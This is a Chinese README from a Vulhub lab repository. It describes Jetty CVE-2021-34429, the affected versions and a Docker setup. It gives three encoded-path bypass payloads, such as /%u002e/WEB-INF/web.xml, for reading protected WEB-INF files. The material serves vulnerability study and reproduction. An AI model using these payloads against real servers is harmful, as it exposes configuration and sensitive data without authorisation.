aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
main
vulhub/jetty/CVE-2021-34429/README.zh-cn.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details
first commit
2025-09-06 16:08:15 +08:00

1.1 KiB
Raw Permalink Blame History

Jetty WEB-INF 敏感信息泄露漏洞CVE-2021-34429

Eclipse Jetty是一个开源的servlet容器它为基于Java的Web容器提供运行环境。

Jetty在9.4.40后修复了因为%2e导致的敏感信息泄露漏洞CVE-2021-28164,但这个修复是不完全的,通过下面三种方式可以进行绕过:

  • unicode形式URL编码/%u002e/WEB-INF/web.xml
  • \0组合.导致的绕过:/.%00/WEB-INF/web.xml
  • \0组合..导致的绕过:/a/b/..%00/WEB-INF/web.xml

影响版本9.4.37-9.4.42, 10.0.1-10.0.5, 11.0.1-11.0.5

参考链接:

漏洞环境

执行如下命令启动一个Jetty 9.4.40

docker compose up -d

服务启动后,访问http://your-ip:8080可以查看到一个example页面。

漏洞复现

直接访问/WEB-INF/web.xml将会返回404页面

使用/%u002e/WEB-INF/web.xml来绕过限制下载web.xml